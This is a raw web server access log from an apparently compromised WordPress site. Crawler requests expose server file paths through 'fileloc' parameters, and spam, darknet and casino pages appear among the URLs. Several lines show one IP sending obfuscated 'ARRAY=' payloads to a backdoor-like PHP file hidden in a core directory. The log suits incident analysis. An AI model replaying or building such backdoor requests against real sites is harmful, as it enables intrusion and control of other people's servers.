216.73.216.76 - - [17/Apr/2026:12:52:19 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fvi-68f2cec7514bf8563c723a4d675fcfe6.json&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages HTTP/2" 200 3604 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.76 - - [17/Apr/2026:12:52:22 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fvi-77fdfadaf2e1ca3a027d1956b910bc50.json&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages HTTP/2" 200 3517 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.216.113.70 - - [17/Apr/2026:12:50:25 +0300] "GET /wp-includes/block-supports/block-supports/index.php?ARRAY=7o2230223n313737363432333032352p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737363431393432352q6631343263323134386335656436353365353836643761663464316464643663222p2232223n223932643065616235646562393731363665653939613364353236323363323436222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36382q37342q38372q3330227q HTTP/1.0" 500 567 "-" "-"
216.73.216.76 - - [17/Apr/2026:12:52:25 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fel-c31d5f185753910c14afebc6deb2ce24.json&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages HTTP/2" 200 15976 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.76 - - [17/Apr/2026:12:52:28 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fvi-e2791ba830489d23043be8650a22a22b.json&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages HTTP/2" 200 3158 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.76 - - [17/Apr/2026:12:52:31 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fvi-e53526243551a102928735ec9eed4edf.json&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages HTTP/2" 200 6810 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.73.172 - - [17/Apr/2026:12:52:33 +0300] "GET /shop/capitalistic/kinovin72111431185.html HTTP/1.1" 200 29766 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.76 - - [17/Apr/2026:12:52:34 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fth-0cc31205f20441b3df1d1b46100f6b8d.json&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages HTTP/2" 200 3757 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.76 - - [17/Apr/2026:12:52:37 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fblock-supports%2Futils.php&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fblock-supports HTTP/2" 200 3261 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.191.171.8 - - [17/Apr/2026:12:52:45 +0300] "GET /casino-deposit-bonus-codes/ HTTP/1.1" 200 8753 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.216.113.70 - - [17/Apr/2026:12:50:47 +0300] "GET /wp-includes/block-supports/block-supports/index.php?ARRAY=7o2230223n313737363432333034372p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737363431393434372q3561383233363263336330663330363964373863393131393934323537623865222p2232223n223932643065616235646562393731363665653939613364353236323363323436222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36382q37342q38372q3330227q HTTP/1.0" 500 567 "-" "-"
216.73.216.76 - - [17/Apr/2026:12:52:48 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2018%2F10%2F.htaccess&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2018%2F10 HTTP/2" 200 2954 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.76 - - [17/Apr/2026:12:52:49 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2025%2F01%2F.htaccess&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2025%2F01 HTTP/2" 200 2953 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.76 - - [17/Apr/2026:12:52:52 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fuk-5251f7623766a714c8207c7edb938628.json&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages HTTP/2" 200 3403 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.73.172 - - [17/Apr/2026:12:52:53 +0300] "GET /shop/delactation/gambrel623990505402.html HTTP/1.1" 200 29079 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.76 - - [17/Apr/2026:12:52:55 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fel-ac23eee47530ac63a1178c827db28087.json&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages HTTP/2" 200 3067 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
85.208.96.206 - - [17/Apr/2026:12:52:55 +0300] "GET /kraken-aktual-nye-ssylki-i-vkhod-v-darknet-2026/ HTTP/1.1" 200 8755 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.73.216.76 - - [17/Apr/2026:12:52:57 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fpt_BR.l10n.php&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages HTTP/2" 200 96880 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.76 - - [17/Apr/2026:12:53:00 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-admin%2Fimages%2Fresize.gif&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-admin%2Fimages HTTP/2" 200 2827 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.76 - - [17/Apr/2026:12:53:04 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fadmin-network-de_DE.po&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages HTTP/2" 200 20494 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.76 - - [17/Apr/2026:12:53:07 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fadmin-network-th.po&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages HTTP/2" 200 21291 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.216.113.70 - - [17/Apr/2026:12:51:08 +0300] "GET /wp-includes/block-supports/block-supports/index.php?ARRAY=7o2230223n313737363432333036382p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737363431393436382q3032376565653936656138383739373864353566616663306164666561323863222p2232223n223932643065616235646562393731363665653939613364353236323363323436222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36382q37342q38372q3330227q HTTP/1.0" 500 567 "-" "-"
216.73.216.76 - - [17/Apr/2026:12:53:10 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes%2Ftwentytwentytwo-ko_KR.mo&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes HTTP/2" 200 2848 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.76 - - [17/Apr/2026:12:53:12 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fadmin-network-es_ES.po&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages HTTP/2" 200 19526 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.191.171.10 - - [17/Apr/2026:12:53:14 +0300] "GET /discover-the-unique-features-of-sushiswap-dex-today-2/ HTTP/1.1" 200 8740 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.73.216.76 - - [17/Apr/2026:12:53:16 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fadmin-ru_RU.po&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages HTTP/2" 200 215791 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.73.173 - - [17/Apr/2026:12:53:15 +0300] "GET /shop/professedprenominal/solenaceous62959783946.html HTTP/1.1" 200 28883 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.172 - - [17/Apr/2026:12:53:16 +0300] "GET /shop/taxed/antbear282162015737.html HTTP/1.1" 200 28388 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.76 - - [17/Apr/2026:12:53:19 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes%2Ftwentytwentyone-fi.mo&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes HTTP/2" 200 2845 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
85.208.96.212 - - [17/Apr/2026:12:53:19 +0300] "GET /2025/10/page/2/ HTTP/1.1" 200 8758 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.73.216.76 - - [17/Apr/2026:12:53:22 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fja-c31d5f185753910c14afebc6deb2ce24.json&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages HTTP/2" 200 11356 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
17.22.237.252 - - [17/Apr/2026:12:53:21 +0300] "GET /discover-the-full-potential-of-solscan-for-investors/?path=/var/www/vhosts/miroglu.net/httpdocs/.tmb HTTP/1.1" 200 9136 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
37.59.204.133 - - [17/Apr/2026:12:53:27 +0300] "GET /unlocking-the-secrets-of-winning-strategies-in-casino-games/ HTTP/2" 200 6978 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
185.216.113.70 - - [17/Apr/2026:12:51:30 +0300] "GET /wp-includes/block-supports/block-supports/index.php?ARRAY=7o2230223n313737363432333039302p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737363431393439302q6162666339623735346661633466626334363331636532356133616333383936222p2232223n223932643065616235646562393731363665653939613364353236323363323436222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36382q37342q38372q3330227q HTTP/1.0" 500 567 "-" "-"
216.73.216.76 - - [17/Apr/2026:12:53:31 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes%2Fhello-elementor-uk.mo&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes HTTP/2" 200 2847 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.76 - - [17/Apr/2026:12:53:35 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fsodium_compat%2Flib%2Fristretto255.php&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fsodium_compat%2Flib HTTP/2" 200 3596 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
17.22.237.120 - - [17/Apr/2026:12:53:38 +0300] "GET /unlocking-the-secrets-of-casino-strategies-for-winning-big/?path=/var/www/vhosts/miroglu.net/httpdocs/wp-includes/PHPMailer HTTP/1.1" 200 4419 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
216.73.216.76 - - [17/Apr/2026:12:53:38 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes%2Ftwentytwentytwo-de_DE.po&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes HTTP/2" 200 11941 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.76 - - [17/Apr/2026:12:53:41 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes%2Ftwentytwentyone-pt_BR.mo&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes HTTP/2" 200 2849 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.76 - - [17/Apr/2026:12:53:44 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes%2Ftwentytwentytwo-id_ID.po&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes HTTP/2" 200 11552 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.76 - - [17/Apr/2026:12:53:47 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fthemes%2Findex.php&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fthemes HTTP/2" 200 2850 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.76 - - [17/Apr/2026:12:53:50 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes%2Ftwentytwentytwo-da_DK.po&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes HTTP/2" 200 11763 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.216.113.70 - - [17/Apr/2026:12:51:52 +0300] "GET /wp-includes/block-supports/block-supports/index.php?ARRAY=7o2230223n313737363432333131322p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737363431393531322q6264386564316637306337623037636131646331393338613066386562393737222p2232223n223932643065616235646562393731363665653939613364353236323363323436222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36382q37342q38372q3330227q HTTP/1.0" 500 567 "-" "-"
216.73.216.76 - - [17/Apr/2026:12:53:53 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes%2Fhello-elementor-zh_TW.mo&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes HTTP/2" 200 2851 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.76 - - [17/Apr/2026:12:53:56 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fel-8860e58c20c6a2ab5876a0f07be43bd9.json&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages HTTP/2" 200 12550 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
17.22.253.224 - - [17/Apr/2026:12:53:56 +0300] "GET /benefits-of-using-solscan-for-crypto-investors/?path=/var/www/vhosts/miroglu.net/httpdocs/wp-includes/js HTTP/1.1" 200 9469 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
66.249.73.173 - - [17/Apr/2026:12:53:58 +0300] "GET /shop/intertranspicuous/thieve282402968287.html HTTP/1.1" 200 29271 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.76 - - [17/Apr/2026:12:53:59 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fvi-8240df461220d1d3a028a9a4c5652a5b.json&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages HTTP/2" 200 3474 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.76 - - [17/Apr/2026:12:54:02 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fvi-ca28138671823450e87dfd354f7afc6b.json&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages HTTP/2" 200 3168 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.76 - - [17/Apr/2026:12:54:05 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes%2Fhello-elementor-sv_SE.mo&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes HTTP/2" 200 2851 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
17.241.75.222 - - [17/Apr/2026:12:54:07 +0300] "GET /discover-the-features-of-solscan-for-crypto-enthusiasts/?fileloc=/var/www/vhosts/miroglu.net/httpdocs/wp-content/languages/admin-network-el.po&path=/var/www/vhosts/miroglu.net/httpdocs/wp-content/languages HTTP/1.1" 200 28263 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
216.73.216.76 - - [17/Apr/2026:12:54:08 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes%2Ftwentytwentyone-fr_FR.mo&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fthemes HTTP/2" 200 2848 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.216.113.70 - - [17/Apr/2026:12:52:14 +0300] "GET /wp-includes/block-supports/block-supports/index.php?ARRAY=7o2230223n313737363432333133342p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737363431393533342q3538353261323532346565316439393363616437646335653865623963366636222p2232223n223932643065616235646562393731363665653939613364353236323363323436222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36382q37342q38372q3330227q HTTP/1.0" 500 567 "-" "-"
216.73.216.76 - - [17/Apr/2026:12:54:20 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2018%2F.htaccess&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2018 HTTP/2" 200 2943 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.76 - - [17/Apr/2026:12:54:24 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Ffi-6025add6bde16aaeb12787d250f9b414.json&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages HTTP/2" 200 3278 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.76 - - [17/Apr/2026:12:54:27 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fpomo%2Fmo.php&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fpomo HTTP/2" 200 5507 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.76 - - [17/Apr/2026:12:54:30 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fsodium_compat%2Fautoload.php&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fsodium_compat HTTP/2" 200 3806 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.76 - - [17/Apr/2026:12:54:33 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages%2Fadmin-network-ko_KR.po&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Flanguages HTTP/2" 200 19856 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
37.59.204.128 - - [17/Apr/2026:12:54:34 +0300] "GET /8185/ HTTP/2" 200 6966 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
185.216.113.70 - - [17/Apr/2026:12:52:36 +0300] "GET /wp-includes/block-supports/block-supports/index.php?ARRAY=7o2230223n313737363432333135362p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737363431393535362q6366613465633862323737326630383533623332383264316635633964663332222p2232223n223932643065616235646562393731363665653939613364353236323363323436222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36382q37342q38372q3330227q HTTP/1.0" 500 567 "-" "-"
